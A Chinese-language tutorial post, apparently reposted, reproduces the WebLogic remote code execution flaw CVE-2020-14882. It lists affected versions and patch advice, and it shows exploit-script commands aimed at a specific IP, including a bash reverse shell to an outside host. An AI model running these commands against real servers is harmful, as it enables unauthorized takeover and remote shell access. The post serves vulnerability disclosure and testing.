C/C++教程

weblogic 远程代码执行 (CVE-2020-14882)

本文主要是介绍weblogic 远程代码执行 (CVE-2020-14882),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

weblogic 远程代码执行 (CVE-2020-14882)

  • weblogic 远程代码执行 (CVE-2020-14882)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 工具
    • 0x04 漏洞修复

weblogic 远程代码执行 (CVE-2020-14882)

0x01 漏洞描述

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。

0x02 影响范围

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

0x03 漏洞复现

工具

cve-2020-14882_rce.py
python3 使用

查看用法

python cve-2020-14882_rce.py

在这里插入图片描述

whoami

python cve-2020-14882_rce.py -u  http://118.193.36.37:44924 -c whoami

在这里插入图片描述

ls /tmp
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c “ls /tmp”
在这里插入图片描述

反弹shell

python cve-2020-14882_rce.py -u  http://118.193.36.37:44924 -c "bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"

虽然显示漏洞检查失败 但是执行成功
在这里插入图片描述
在这里插入图片描述

0x04 漏洞修复

安装官方最新补丁进行升级:
https://www.oracle.com/security-alerts

由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。

这篇关于weblogic 远程代码执行 (CVE-2020-14882)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!